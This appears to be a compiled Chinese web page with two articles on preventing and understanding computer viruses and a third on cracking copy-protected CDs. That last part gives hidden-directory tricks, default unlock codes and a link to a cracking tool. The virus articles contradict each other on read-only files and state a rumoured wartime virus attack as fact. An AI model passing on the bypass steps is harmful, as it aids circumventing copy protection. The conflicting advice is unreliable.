    计算机感染病毒后会给我们带来很多不必要的麻烦，因此如何预防病毒是一件刻不容缓的工作。下面笔者将介绍一些预防病毒的措施：
    一、杜绝传染渠道
    病毒的传染无非是两种方式：一是网络，二是软盘与光盘。如今由于电子邮件的盛行，通过互联网传递的病毒要远远高于后者。为此，我们要特别注意在网上的行为。
    1、不要轻易下载小网站的软件与程序。
    2、不要光顾那些很诱惑人的小网站，因为这些网站很有可能就是网络陷阱。
    3、不要随便打开某些来路不明的E-mail与附件程序。
    4、安装正版杀毒软件公司提供的防火墙，比如赛门铁克的个人防火墙软件，并注意时时打开着。
    5、不要在线启动、阅读某些文件，否则您很有可能成为网络病毒的传播者。
    6、经常给自己发封E-mail，看看是否会收到第二封未属标题及附带程序的邮件。
    对于软盘，光盘传染的病毒，我想预防的方法就是不要随便打开程序或安装软件。可以先复制到硬盘上，接着用杀毒软件检查一遍，再执行安装或打开命令。
    二、设置传染对象的属性
    病毒其实是一段程序或指令代码，它主要针对的是以EXE与COM结尾的文件，由于它天生的局限性，因此预防病毒的另一种方法便是设置传染对象的属性，即：把所有以EXE与COM为扩展名的文件设定“只读”。这样一来就算病毒程序被激活，也无法对其他程序进行写操作，也就不能感染可执行程序了，因此病毒的破坏功能受到了很大的限制。
    关于宏病毒
    不夸张地说，几乎所有使用Word的朋友都曾经与宏病毒狭路相逢过。宏病毒的产生主要是因为Word本身配有内置语言，简单地说就是具备编程功能，因此有很多别有用心的人就利用了它的这一功能制作出宏病毒。宏病毒的破坏性虽不大，但对于靠笔杆为生的人的来说确实是一种负担，为此笔者特意借此文告诉大家一些检测、预防宏病毒的方法。
    一、检测宏病毒
    宏病毒的检测其实非常简单，只要点击Word界面上菜单栏的[工具]→[宏]→[宏]，接着在“宏名”列表中查看是否有AutoExce与AutoOpen两个自动宏便可。
    二、预防宏病毒
    宏病毒通常是驻留在文档或模板的宏中，如果打开这样的文档或模板，就会激活宏病毒，并使病毒进入Normal.dot模板文件中。为此要预防宏病毒，可以采用以下方法：
    1、利用Word本身具有清除宏(病毒)的功能。当Word识别出一个打开的文档中具有自动执行宏时，它会出现一个对话框，让用户选择是否打开宏，为了预防宏病毒一般我们选择[取消宏]按钮。
    2、在Normal.dot模板文件中创建一个自己的宏(AutoExce)，具体代码为：
    “Sub Main
    DisableAutoMacros 1
    End Sub”
    这样就能禁止其他自动宏的运行，预防宏病毒的感染。另外注意一点，此程序是在Word的“工具/宏/Visual Basic编辑器”中完成。
    3、将文件保存为TXT(纯文本文件)或RTF形式(文本文件，但可以包括其他一些非文本文件信息，例如：图片，表格等)。
    其实大可不必对病毒感到非常恐惧，甚至闻风丧胆，因为毕竟创造病毒的还是人不是神，只要大家对病毒有所认识并加以预防，我想它就不会如此嚣张跋扈。另外，现在众多的杀毒软件厂商都为我们提供了功能齐备的软件，你要做的仅仅是定期升级、定期查杀即可。但愿此文能给善良的电脑爱好者以帮助，彻底消除病毒带给我们的困扰与烦恼！


计算机病毒知识大全

《一键清理系统垃圾》

计算机病毒知识大全

   提起计算机病毒，相信绝大多数用户都不会陌生（即使那些没有接触过计算机的人大多也听说过），有些用户甚至还对计算机病毒有着切肤之痛，不过要问起计算机病毒是如何产生的、病毒到底有些什么特征，能够回答生来的用户可能并不多。为此，本人特将有关计算机病毒的定义、起源、历史、特征、传播途径、分类、最新动态、错误认识、防毒原则、解决病毒的办法等内容汇集成文，希望能对广大用户日常的反病毒操作有所帮助：
一、病毒定义
   计算机病毒是指那些具有自我复制能力的计算机程序，它能影响计算机软件、硬件的正常运行，破坏数据的正确与完整。
二、病毒起源
   计算机病毒的来源多种多样，有的是计算机工作人员或业余爱好者为了纯粹寻开心而制造出来的，有的则是软件公司为保护自己的产品被非法拷贝而制造的报复性惩罚，因为他们发现病毒比加密对付非法拷贝更有效且更有威胁，这种情况助长了病毒的传播。还有一种情况就是蓄意破坏，它分为个人行为和政府行为两种。个人行为多为雇员对雇主的报复行为，而政府行为则是有组织的战略战术手段（据说在海湾战争中，美国防部一秘密机构曾对伊拉克的通讯系统进行了有计划的病毒攻击，一度使伊拉克的国防通讯陷于瘫痪）。另外有的病毒还是用于研究或实验而设计的"有用"程序，由于某种原因失去控制扩散出实验室或研究所，从而成为危害四方的计算机病毒。
三、病毒历史
   病毒是如何一步步的从无到有、从小到大的发展到今天的地步的呢？下面的介绍可以解除你的这一疑问：
   概念的提出 "计算机病毒"这一概念是1977年由美国著名科普作家"雷恩"在一部科幻小说《P1的青春》中提出
   1983年 美国计算机安全专家"考因"首次通过实验证明了病毒的可实现性。
   1987年 世界各地的计算机用户几乎同时发现了形形色色的计算机病毒，如大麻、IBM圣诞树、黑色星期五等等，面对计算机病毒的突然袭击，众多计算机用户甚至专业人员都惊慌失措。
   1989年 全世界的计算机病毒攻击十分猖獗，我国也未幸免。其中"米开朗基罗"病毒给许多计算机用户造成极大损失。
   1991年 在"海湾战争"中，美军第一次将计算机病毒用于实战，在空袭巴格达的战斗中，成功地破坏了对方的指挥系统，使之瘫痪，保证了战斗的顺利进行，直至最后胜利。
   1992年 出现针对杀毒软件的"幽灵"病毒，如One-half。
   1996年 首次出现针对微软公司Office的"宏病毒"。
   1997年 1997年被公认为计算机反病毒界的"宏病毒"年。"宏病毒"主要感染WORD、EXCEL等文件。如Word宏病毒，早期是用一种专门的Basic语言即WordBasic所编写的程序，后来使用Visual Basic。与其它计算机病毒一样，它能对用户系统中的可执行文件和数据文本类文件造成破坏。常见的如：Tw no. 1（台湾一号）、Setmd、Consept、Mdma等。
   1998年 出现针对Windows95/98系统的病毒，如CIH（1998年被公认为计算机反病毒界的CIH病毒年）。CIH病毒是继DOS病毒、Windows病毒、宏病毒后的第四类新型病毒。这种病毒与DOS下的传统病毒有很大不同，它使用面向Windows的VXD技术编制。1998年8月份从台湾传入国内，共有三个版本：1. 2版/1. 3版/1. 4版，发作时间分别是4月26日/6月26日/每月26日。该病毒是第一个直接攻击、破坏硬件的计算机病毒，是迄今为止破坏最为严重的病毒。它主要感染Windows95/98的可执行程序，发作时破坏计算机Flash BIOS芯片中的系统程序，导致主板损坏，同时破坏硬盘中的数据。病毒发作时，硬盘驱动器不停旋转，硬盘上所有数据（包括分区表）被破坏，必须重新FDISK方才有可能挽救硬盘；同时，对于部分厂牌的主板（如技嘉和微星等），会将Flash BIOS中的系统程序破坏，造成开机后系统无反应。
   1999年 Happy99等完全通过Internet传播的病毒的出现标志着Internet病毒将成为病毒新的增长点。其特点就是利用Internet的优势，快速进行大规模的传播，从而使病毒在极短的时间内遍布全球。
四、病毒的特征
   提起病毒，大家都很熟悉，可说到病毒到底有哪些特征，能有说出个所以然的用户却不多，许多用户甚至根本搞不清到底什么是病毒，这就严重影响了对病毒的防治工作。有鉴于此，特将常见病毒的特征简要介绍如下，希望广大用户能藉以对病毒有一个较完善的灵性认识。
1. 传染性
   传染性是病毒的基本特征。在生物界，通过传染病毒从一个生物体扩散到另一个生物体。在适当的条件下，它可得到大量繁殖，并使被感染的生物体表现出病症甚至死亡。同样，计算机病毒也会通过各种渠道从已被感染的计算机扩散到未被感染的计算机，在某些情况下造成被感染的计算机工作失常甚至瘫痪。与生物病毒不同的是，计算机病毒是一段人为编制的计算机程序代码，这段程序代码一旦进入计算机并得以执行，它会搜寻其他符合其传染条件的程序或存储介质，确定目标后再将自身代码插入其中，达到自我繁殖的目的。只要一台计算机染毒，如不及时处理，那么病毒会在这台机子上迅速扩散，其中的大量文件（一般是可执行文件）会被感染。而被感染的文件又成了新的传染源，再与其他机器进行数据交换或通过网络接触，病毒会继续进行传染。
   正常的计算机程序一般是不会将自身的代码强行连接到其它程序之上的。而病毒却能使自身的代码强行传染到一切符合其传染条件的未受到传染的程序之上。计算机病毒可通过各种可能的渠道，如软盘、计算机网络去传染其它的计算机。当你在一台机器上发现了病毒时，往往曾在这台计算机上用过的软盘已感染上了病毒，而与这台机器相联网的其它计算机也许也被该病毒侵染上了。是否具有传染性是判别一个程序是否为计算机病毒的最重要条件。
2. 未经授权而执行
   一般正常的程序是由用户调用，再由系统分配资源，完成用户交给的任务。其目的对用户是可见的、透明的。而病毒具有正常程序的一切特性，它隐藏再正常程序中，当用户调用正常程序时窃取到系统的控制权，先于正常程序执行，病毒的动作、目的对用户时未知的，是未经用户允许的。
3. 隐蔽性
   病毒一般是具有很高编程技巧、短小精悍的程序。通常附在正常程序中或磁盘较隐蔽的地方，也有个别的以隐含文件形式出现。目的是不让用户发现它的存在。如果不经过代码分析，病毒程序与正常程序是不容易区别开来的。一般在没有防护措施的情况下，计算机病毒程序取得系统控制权后，可以在很短的时间里传染大量程序。而且受到传染后，计算机系统通常仍能正常运行，使用户不会感到任何异常。试想，如果病毒在传染到计算机上之后，机器马上无法正常运行，那么它本身便无法继续进行传染了。正是由于隐蔽性，计算机病毒得以在用户没有察觉的情况下扩散到上百万台计算机中。大部分的病毒的代码之所以设计得非常短小，也是为了隐藏。病毒一般只有几百或1k字节，而PC机对DOS文件的存取速度可达每秒几百KB以上，所以病毒转瞬之间便可将这短短的几百字节附着到正常程序之中，使人非常不易被察觉。
4. 潜伏性
   大部分的病毒感染系统之后一般不会马上发作，它可长期隐藏在系统中，只有在满足其特定条件时才启动其表现（破坏）模块。只有这样它才可进行广泛地传播。如"PETER-2"在每年2月27日会提三个问题，答错后会将硬盘加密。著名的"黑色星期五"在逢13号的星期五发作。国内的"上海一号"会在每年三、六、九月的13日发作。当然，最令人难忘的便是26日发作的CIH。这些病毒在平时会隐藏得很好，只有在发作日才会露出本来面目。
5. 破坏性
   任何病毒只要侵入系统，都会对系统及应用程序产生程度不同的影响。轻者会降低计算机工作效率，占用系统资源，重者可导致系统崩溃。由此特性可将病毒分为良性病毒与恶性病毒。良性病度可能只显示些画面或出点音乐、无聊的语句，或者根本没有任何破坏动作，但会占用系统资源。这类病毒较多，如：GENP、小球、W-BOOT等。恶性病毒则有明确得目的，或破坏数据、删除文件或加密磁盘、格式化磁盘，有的对数据造成不可挽回的破坏。这也反映出病毒编制者的险恶用心（最著名的恐怕就是CIH病毒了）。
6. 不可预见性
   从对病毒的检测方面来看，病毒还有不可预见性。不同种类的病毒，它们的代码千差万别，但有些操作是共有的（如驻内存，改中断）。有些人利用病毒的这种共性，制作了声称可查所有病毒的程序。这种程序的确可查出一些新病毒，但由于目前的软件种类极其丰富，且某些正常程序也使用了类似病毒的操作甚至借鉴了某些病毒的技术。使用这种方法对病毒进行检测势必会造成较多的误报情况。而且病毒的制作技术也在不断的提高，病毒对反病毒软件永远是超前的。
   看了上面的介绍，你是不是对计算机病毒有了一个初步的了解？
五、病毒的传播途径
1. 通过不可移动的计算机硬件设备进行传播(即利用专用ASIC芯片和硬盘进行传播)。这种病毒虽然极少，但破坏力却极强，目前尚没有较好的检测手段对付。
2. 通过移动存储设备来传播（包括软盘、磁带等）。其中软盘是使用最广泛移动最频繁的存储介质，因此也成了计算机病毒寄生的"温床"。
3. 通过计算机网络进行传播。随着Internet的高速发展，计算机病毒也走上了高速传播之路，现在通过网络传播已经成为计算机病毒的第一传播途径。
4. 通过点对点通信系统和无线通道传播。
六、病毒的分类
   各种不同种类的病毒有着各自不同的特征，它们有的以感染文件为主、有的以感染系统引导区为主、大多数病毒只是开个小小的玩笑、但少数病毒则危害极大（如臭名昭著CIH病毒），这就要求我们采用适当的方法对病毒进行分类，以进一步满足日常操作的需要：
1. 按传染方式分类
   病毒按传染方式可分为引导型病毒、文件型病毒和混合型病毒三种。其中引导型病毒主要是感染磁盘的引导区，我们在使用受感染的磁盘（无论是软盘还是硬盘）启动计算机时它们就会首先取得系统控制权，驻留内存之后再引导系统，并伺机传染其它软盘或硬盘的引导区，它一般不对磁盘文件进行感染；文件型病毒一般只传染磁盘上的可执行文件（COM，EXE），在用户调用染毒的可执行文件时，病毒首先被运行，然后病毒驻留内存伺机传染其他文件或直接传染其他文件，其特点是附着于正常程序文件，成为程序文件的一个外壳或部件；混合型病毒则兼有以上两种病毒的特点，既染引导区又染文件，因此扩大了这种病毒的传染途径。
2. 按连接方式分类
   病毒按连接方式分为源码型病毒、入侵型病毒、操作系统型病毒、外壳型病毒等四种。其中源码病毒主要攻击高级语言编写的源程序，它会将自己插入到系统的源程序中，并随源程序一起编译、连接成可执行文件，从而导致刚刚生成的可执行文件直接带毒，不过该病毒较为少见，亦难以编写；入侵型病毒则是那些用自身代替正常程序中的部分模块或堆栈区的病毒，它只攻击某些特定程序，针对性强，一般情况下也难以被发现，清除起来也较困难；操作系统病毒则是用其自身部分加入或替代操作系统的部分功能，危害性较大；外壳病毒主要是将自身附在正常程序的开头或结尾，相当于给正常程序加了个外壳，大部份的文件型病毒都属于这一类。
3. 按破坏性分类
   病毒按破坏性可分为良性病毒和恶性病毒。顾名思义，良性病毒当然是指对系统的危害不太大的病毒，它一般只是作个小小的恶作剧罢了，如破坏屏幕显示、播放音乐等（需要注意的是，即使某些病毒不对系统造成任何直接损害，但它总会影响系统性能，从而造成了一定的间接危害）；恶性病毒则是指那些对系统进行恶意攻击的病毒，它往往会给用户造成较大危害，如最近十分流行的CIH病毒就就属此类，它不仅删除用户的硬盘数据，而且还破坏硬件（主板），实可谓"十恶不赦"！
4. 按程序运行平台分类
   病毒按程序运行平台分类可分为DOS病毒、Windows病毒、Windows NT病毒、OS/2病毒等，它们分别发作于DOS、Windows 9X、Windows NT、OS/2等操作系统平台上的病毒。
5. 新型病毒
   部分新型病毒由于其独特性而暂时无法按照前面的类型进行分类，如宏病毒、黑客软件、电子邮件病毒等。
   宏病毒主要是使用某个应用程序自带的宏编程语言编写的病毒，如感染WORD系统的WORD宏病毒、感染EXCEL系统的EXCEL宏病毒和感染Lotus Ami Pro的宏病毒等。宏病毒与以往的病毒有着截然不同的特点，如它感染数据文件，彻底改变了人们的"数据文件不会传播病毒"的错误认识；宏病毒冲破了以往病毒在单一平台上传播的局限，当WORD、EXCEL这类软件在不同平台(如WINDOWS、WINDOWS NT、OS/2和MACINTOSH等)上运行时，就可能会被宏病毒交叉感染；以往病毒是以二进制的计算机机器码形式出现，而宏病毒则是以人们容易阅读的源代码形式出现，所以编写和修改宏病毒比以往病毒更容易；另外宏病毒还具有容易传播、隐蔽性强、危害巨大等特点。最终来说，宏病毒应该算是一种特殊的文件型病毒，同时它应该也可以算是"按程序运行平台分类"中的一种特例。
   黑客软件本身并不是一种病毒，它实质是一种通讯软件，而不少别有用心的人却利用它的独特特点来通过网络非法进入他人计算机系统，获取或篡改各种数据，危害信息安全。正是由于黑客软件直接威胁各个广大网民的数据安全，况且用户手工很难对其进行防范的独特特点，因此各大反病毒厂商纷纷将黑客软件纳入病毒范围，利用杀毒软件将黑客从用户的计算机中驱逐出境，从而保护了用户的网络安全。
   电子邮件病毒实际上并不是一类单独的病毒，它严格来说应该划入到文件型病毒及宏病毒中去，只不过由于这些病毒采用了独特的电子邮件传播方式（其中不少种类还专门针对电子邮件的传播方式进行了优化），因此我们习惯于将它们定义为电子邮件病毒。
七、最新动态
   近一段时间以来，计算机病毒不但没有象人们想象的那样随着Internet的流行而趋于消亡，而是进一步的爆发流行，如CIH、Happy99等，它们与以往的病毒相比具有一些新的特点，如传染性、隐蔽性、破坏性等，给广大计算机用户带来了极大的经济损失。为方便用户的使用，现将计算机病毒的最新动态向大家做一个简要介绍：
   多形性病毒 多形性病毒又名"幽灵"病毒，是指采用特殊加密技术编写的病毒，这种病毒在每感染一个对象时采用随机方法对病毒主体进行加密，因而完全多形性病毒的主要不同样本中甚至不存在连续两个相同的字节。这种病毒主要是针对查毒软件而设计的，所以使得查毒软件的编写更困难，并且还会带来许多误报。
   轻微破坏病毒 文件备份是人们用于对抗病毒的一种常用的方法，轻微破坏病毒就是针对备份而设计的。它每次只破坏一点点数据，用户难以察觉，这就导致用户每次备份的数据均是已被破坏的内容。当用户发觉到数据被彻底破坏时，可能所有备份中的数据均是被破坏的，这时的损失是难以估计的。
   宏病毒 宏病毒是使用某种应用程序自带的宏编程语言编写的病毒，目前国际上已发现五类：Word宏病毒、Excel宏病毒、Access宏病毒、Ami Pro宏病毒、Word Perfect宏病毒。其中Word宏病毒最多，流行最范围最广，96年下半年开始在我国出现，97年在全国各地广泛流行，成为目前最主要的病毒，如Tw No. 1(台湾一号)、Concept(概念)、SetMd、Cap、MdMa(无政府一号)等。
   病毒生成工具 病毒生成工具通常是以菜单形式驱动，只要是具备一点计算机知识的人，利用病毒生成工具就可以象点菜一样轻易地制造出计算机病毒，而且可以设计出非常复杂的具有偷盗和多形性特征的病毒。如：G2、VCL、MTE、TPE等。
   黑客软件 黑客软件本身并不是一种病毒，它实际上是一种通讯软件，而不少别有用心的人却利用它的独特特点来通过网络非法进入他人计算机系统，获取或篡改各种数据，危害信息安全。正是由于黑客软件直接威胁各个广大网民的数据安全，况且用户手工很难对其进行防范，因此各大反病毒厂商纷纷将黑客软件纳入病毒范围，利用杀毒软件将黑客从用户的计算机中驱逐出境（黑客软件对既没有上Internet、又没有连局域网纯粹的单机没有危害）。
   电子邮件病毒 电子邮件病毒实际上并不是一类单独的病毒，它严格来说应该划入到文件型病毒及宏病毒中去，只不过由于这些病毒采用了独特的电子邮件传播方式（其中不少种类还专门针对电子邮件的传播方式进行了优化，如前一段时间曾爆发流行的Happy99），因此我们习惯于将它们定义为电子邮件病毒。
八、病毒的破坏行为
   不同病毒有不同的破坏行为，其中有代表性的行为如下：
1. 攻击系统数据区 即攻击计算机硬盘的主引寻扇区、Boot扇区、FAT表、文件目录等内容（一般来说，攻击系统数据区的病毒是恶性病毒，受损的数据不易恢复）。
2. 攻击文件 是删除文件、修改文件名称、替换文件内容、删除部分程序代码等等。
3. 攻击内存 内存是计算机的重要资源，也是病毒的攻击目标。其攻击方式主要有占用大量内存、改变内存总量、禁止分配内存等。
4. 干扰系统运行 不执行用户指令、干扰指令的运行、内部栈溢出、占用特殊数据区、时钟倒转、自动重新启动计算机、死机等。
5. 速度下降 不少病毒在时钟中纳入了时间的循环计数，迫使计算机空转，计算机速度明显下降。
6. 攻击磁盘 攻击磁盘数据、不写盘、写操作变读操作、写盘时丢字节等。
7. 扰乱屏幕显示 字符显示错乱、跌落、环绕、倒置、光标下跌、滚屏、抖动、吃字符等。
8. 攻击键盘 响铃、封锁键盘、换字、抹掉缓存区字符、重复输入。
9. 攻击喇叭 发出各种不同的声音，如演奏曲子、警笛声、炸弹噪声、鸣叫、咔咔声、嘀嗒声
10. 攻击CMOS 对CMOS区进行写入动作，破坏系统CMOS中的数据。
11. 干扰打印机 间断性打印、更换字符等。
九、防毒原则
1. 不使用盗版或来历不明的软件，特别不能使用盗版的杀毒软件。
2. 写保护所有系统盘，绝不把用户数据写到系统盘上。
3. 安装真正有效的防毒软件，并经常进行升级。
4. 新购买的电脑要在使用之前首先要进行病毒检查，以免机器带毒。
5. 准备一张干净的系统引导盘，并将常用的工具软件拷贝到该软盘上，然后加以保存。此后一旦系统受"病毒"侵犯，我们就可以使用该盘引导系统，然后进行检查、杀毒等操作。
6. 对外来程序要使用尽可能多的查毒软件进行检查（包括从硬盘、软盘、局域网、Internet、Email中获得的程序），未经检查的可执行文件不能拷入硬盘，更不能使用。
7. 尽量不要使用软盘启动计算机。
8. 一定要将硬盘引导区和主引导扇区备份下来，并经常对重要数据进行备份，防患于未然。
9. 随时注意计算机的各种异常现象（如速度变慢、出现奇怪的文件、文件尺寸发生变化、内存减少等），一旦发现，应立即用杀毒软件仔细检查。
十、碰到病毒之后的解决办法
1. 在解毒之前，要先备份重要的数据文件。
2. 启动反病毒软件，并对整个硬盘进行扫描。
3. 发现病毒后，我们一般应利用反病毒软件清除文件中的病毒，如果可执行文件中的病毒不能被清除，一般应将其删除，然后重新安装相应的应用程序。同时，我们还应将病毒样本送交反病毒软件厂商的研究中心，以供详细分析。
4. 某些病毒在Windows 98状态下无法完全清除（如CIH病毒就是如此），此时我们应采用事先准备的干净的系统引导盘引导系统，然后在DOS下运行相关杀毒软件进行清除。
十一、对计算机病毒的错误认识
   随着计算机反病毒技术的不断发展，广大用户对计算机病毒的了解也是越来越深，以前那种"谈毒色变"的情况再也不会出现了！不过本人在日常错作过程中发现，许多用户对病毒的认识还存在着一定的误区，如"认为自己已经购买了正版的杀毒软件，因而再也不会受到病毒的困扰了"、"病毒不感染数据文件"等，这些错误认识在一定程度上影响了用户对病毒的正确处理（如前段时间不少被CIH病毒感染的计算机中都安装有反病毒软件，只不过由于用户没有及时升级杀毒软件的病毒代码才导致了这一悲剧）！为此，特将用户的这些错误认识列举如下，希望对大家今后的操作有所帮助。
   错误认识一"对感染病毒的软盘进行浏览就会导致硬盘被感染"。我们在使用资源管理器或DIR命令浏览软盘时，系统不会执行任何额外的程序，我们只要保证操作系统本身干净无毒，那么无论是使用Windows 98的资源管理器还是使用DOS的DIR命令浏览软盘都不会引起任何病毒感染的问题。
   错误认识二"将文件改为只读方式可免受病毒的感染"。某些人认为通过将文件的属性设置为只读会十分有效的抵御病毒，其实修改一个文件的属性只需要调用几个DOS中断就可以了，这对病毒来说绝对是"小菜一碟"。我们甚至可以说，通过将文件设置为只读属性对于阻止病毒的感染及传播几乎是无能为力。
   错误认识三"病毒能感染处于写保护状态的磁盘"。前面我们谈到，病毒可感染只读文件，不少人由此认为病毒也能修改那些提供了写保护功能的磁盘上的文件，而事实却并非如此。一般来说，磁盘驱动器可以判断磁盘是否写保护、是否应该对其进行写操作等，这一切都是由硬件来控制的，用户虽然能物理地解除磁盘驱动器的写保护传感器，却不能通过软件来达到这一目的。
   错误认识四"反病毒软件能够清除所有已知病毒"。由于病毒的感染方式很多，其中有些病毒会强行利用自身代码覆盖源程序中的部分内容（以达到不改变被感染文件长度的目的）。当应用程序被这样的病毒感染之后，程序中被覆盖的代码是无法复原的，因此这种病毒是无法安全杀除的（病毒虽然可以杀除，但用户原有的应用程序却不能恢复）。
   错误认识五"使用杀毒软件可以免受病毒的侵扰"。目前市场上出售的杀毒软件，都只能在病毒传播之后才"一展身手"，但在杀毒之前病毒已经造成了工作的延误、数据的破坏或其它更为严重的后果。因此广大用户应该选择一套完善的反毒系统，它不仅应包括常见的查、杀病毒功能，还应该同时包括有实时防毒功能，能实时地监测、跟踪对文件的各种操作，一旦发现病毒，立即报警，只有这样才能最大程度地减少被病毒感染的机会。
   错误认识六"磁盘文件损坏多为病毒所为"。磁盘文件的损坏有多种原因，如电源电压波动、掉电、磁化、磁盘质量低劣、硬件错误、其它软件中的错误、灰尘、烟灰、茶水、甚至一个喷嚏都可能导致数据丢失（对保存在软盘上的数据而言）。这些所作所为对文件造成的损坏会比病毒造成的损失更常见、更严重，这点务必引起广大用户的注意。
   错误认识七"如果做备份的时候系统就已经感染了病毒，那么这些含有病毒的备份将是无用的"。尽管用户所作的备份也感染了病毒的确会带来很多麻烦，但这绝对不至于导致备份失效，我们可根据备份感染病毒的情况分别加以处理--若备份的软盘中含有引导型病毒，那么只要不用这张盘启动计算机就不会传染病读；如果备份的可执行文件中传染了病毒，那么可执行文件就算白备份了，但是备份的数据文件一般都是可用的（除Word之类的文件外，其它数据文件一般不会感染病毒）。
   错误认识八"反病毒软件可以随时随地防护任何病毒"。很显然，这种反病毒软件是不存在的！随着各种新病毒的不断出现，反病毒软件必须快速升级才能达到杀除病毒的目的。具体来说，我们在对抗病毒时需要的是一种安全策略和一个完善的反病毒系统，用备份作为防病毒的第一道防线，将反病毒软件作为第二道防线。而及时升级反病毒软件的病毒代码则是加固第二道防线的唯一方法。
   错误认识九"病毒不能从一种类型计算机向另一种类型计算机蔓延"。目前的宏病毒能够传染运行Word或Excel的多种平台，如Windows 9X、Windows NT、Macintosh等。
   错误认识十"病毒不感染数据文件"。尽管多数病毒都不感染数据文件，但宏病毒却可感染包含可执行代码的MS-Office数据文件(如Word、Excel等)，这点务必引起广大用户的注意。
   错误认识十一"病毒能隐藏在电脑的CMOS存储器里"。不能！因为CMOS中的数据不是可执行的，尽管某些病毒可以改变CMOS数据的数值（结果就是致使系统不能引导），但病毒本身并不能在CMOS中蔓延或藏身于其中。
   错误认识十二"Cache中能隐藏病毒"。不能！Cache种的数据在关机后会消失，病毒无法长期置身其中。
   怎么样？还不对照看看自己是不是陷入了某个认识上的误区中？若真要是这样，那可一定要小心噢！


加密光盘破解不完全功略

《一键清理系统垃圾》

加密光盘破解不完全功略

  第一部分,图片音乐光盘的破解
一般加密光盘最常用的加密方法就是加密目录让你在windows自带的资源管理器中无法看到这个隐藏的目录(当然不会只是加个隐藏属性那么简单了).然而dos(windows中自带的dos即可)往往可以看到和进入这些本来被隐藏的文件夹.
我们以我的卡通音乐mp3的cd为例子,正常情况下我们看到的文件和目录的情况是这样的:

h:\\>dir
驱动器 h 中的卷是 2000_64
卷的序列号是 d285-3a07

h:\\ 的目录

04/09/1997 22:26 27 autorun.inf
07/29/2000 21:27 <dir> browse
07/29/2000 19:44 <dir> image
04/23/1997 11:45 450,048 setup.exe
07/30/2000 19:38 214 说明.txt
3 个文件 450,289 字节
2 个目录 0 可用字节

(其中h:\\盘就是我的光驱),那么会不会是h盘的目录隐藏了呢?那么:

h:\\>dir /a
驱动器 h 中的卷是 2000_64
卷的序列号是 d285-3a07

h:\\ 的目录

04/09/1997 22:26 27 autorun.inf
07/29/2000 21:27 <dir> browse
07/29/2000 19:44 <dir> image
04/23/1997 11:45 450,048 setup.exe
07/30/2000 19:38 214 说明.txt
3 个文件 450,289 字节
2 个目录 0 可用字节

看来除了browse和image并没有其他目录了,可是我的mp3文件存放在哪里了呢?让我找找看吧:

h:\\>dir *.mp3 /a/s/p
驱动器 h 中的卷是 2000_64
卷的序列号是 d285-3a07
找不到文件

没有?这说明什么----这是一个非一般隐藏属性的隐藏目录(如果假设这些mp3在一个目录中的话),于是我通过autorun进入文件的目录中,随便打开一个mp3文件,查看它的属性(我用的是win自带的mediaplayer,方法是file(文件)-properties(属性)中的location(位置)为”h:\\d r2\\头文字d歌唱集\\track 02.mp3”,嗯?这是什么? --“h:\\d r2\\”看到了吗,这里有一个隐藏的目录,这就是我们要找的目录!好,现在我们试着进入它:
(注意这里的步骤!)首先:

h:\\>cd d r2

h:\\d r2>dir
驱动器 h 中的卷是 2000_64
卷的序列号是 d285-3a07

h:\\d r2 的目录

07/29/2000 19:43 <dir> .
01/01/1601 01:00 <dir> ..
02/23/1997 10:46 51 _system1.dat
05/03/1997 00:04 461,312 filelist.exe
07/30/2000 18:58 <dir> gs美神歌集
07/30/2000 19:01 <dir> gto
07/30/2000 19:01 <dir> winamp
04/06/1997 03:03 0 ~_9a90bc.tmp
07/30/2000 19:01 <dir> 不思议游戏歌集
07/30/2000 19:01 <dir> 纲铁神兵主题歌集
07/30/2000 19:01 <dir> 梦幻模擬战v歌集
07/30/2000 19:01 <dir> 青之六号
07/30/2000 19:01 <dir> 他和她的故事i
07/30/2000 19:01 <dir> 他和她的故事ii
07/30/2000 19:01 <dir> 他和她的故事iii
07/30/2000 19:01 <dir> 头文字d歌唱集
07/30/2000 19:01 <dir> 下级生
07/30/2000 19:01 <dir> 校园放送部
3 个文件 461,363 字节
15 个目录 0 可用字节

好,dos里没有问题,我们试试在资源管理器中打开:
开始---运行---键入“h:\\d r2”
系统会出现如下提示:
该文件没有程序与之关联来执行该操作。请在控制面板的文件夹选项中创建关联。
确定
看来这个目录还不能这么轻易的进去,那么我们选择另一条路---还记得”h:\\d r2\\头文字d歌唱集\\track 02.mp3”吗?其中”h:\\d r2\\头文字d歌唱集\\”也是一个目录呀,我们试试这个,方法同上,不在重复,呵呵!成功!进入了这个目录!之后点”向上”按钮,看看出来什么了?整个”d r2”目录下所有mp3歌曲的目录在资源管理器的窗口下!!之后的事我就不用教你了吧?!这样即使你没有序列号,也可以进入经加密处理的光盘了.(其中d r2的目录是固定的,不同的是之下的各个目录,而如果你细心就会发信其中还有一个叫filelist.exe的文件也是固定的,这意味着什么呢?呵呵,不说你也懂了吧-不过基于安全和方便的原因不推荐适用这个文件)
另外,这类光盘的注册码一般为658888和886655.

第二部分,电影动画光盘的破解
相同的,这类光盘的解密工作也是在目录的非一般性隐藏,我以我的柯南地3部rm格式的光盘为例.
光盘的目录是这样的:
h:\\>dir /s/a:d /w
驱动器 h 中的卷是 905
卷的序列号是 519c-4db0

h:\\ 的目录

[tif-24b] [tools]
0 个文件 0 字节

h:\\tif-24b 的目录

[.] [..]
0 个文件 0 字节

h:\\tools 的目录

[.] [..] [fulldata]
0 个文件 0 字节

h:\\tools\\fulldata 的目录

[.] [..]
0 个文件 0 字节

所列文件总数:
0 个文件 0 字节
9 个目录 0 可用字节
其中请记住h:\\tools\\中只有h:\\tools\\fulldata这一个目录.
这样看来,我们看到的光盘文件目录和上面的光盘目录一样,都无法找到这个非一般隐藏性的目录,而在查找*.rm和*.ram文件的时候也是根本无法找到任何的信息,不过我们在通过光盘autorun执行的浏览器中,点”向上”,之后发现了一个名为fulldata的目录(此时已经无法再向上了,而这已经足够了,我们通过这个fulldata目录已经可以断定现在的文件夹就是h:\\tools\\了!)而现在的这个文件夹下竟然有两个目录-另外一个是名为”_sys1.hdr”的目录,显然动画文件目录=我们刚刚的那个目录=现在的目录\\_sys1.hdr= h:\\tools\\_sys1.hdr\\,呵呵,最后的公式即动画文件目录=h:\\tools\\_sys1.hdr\\,最后,开始---运行--- 键入”h:\\tools\\_sys1.hdr\\”,看到什么?呵呵,开始看片吧.
另外,柯南系列光盘正常运行的方法是在autorun的画面中安cok三个键.

第3部分,软件破解
这个软件模拟加密光盘的filelist.exe文件而不用序列号,我为它稍微改编了一下代码,现在的文件是764k,暂时命名为加密光盘破解zero版,文件名是unlockcd.exe,如果你要下载请到http://elma.myrice.com

---------------------------------
附,
1.常见加密光盘启动方法:
在自启动(autorun)画面上输入: cok,www,8888或按f12
序列号: 886655,658888,www,letmein
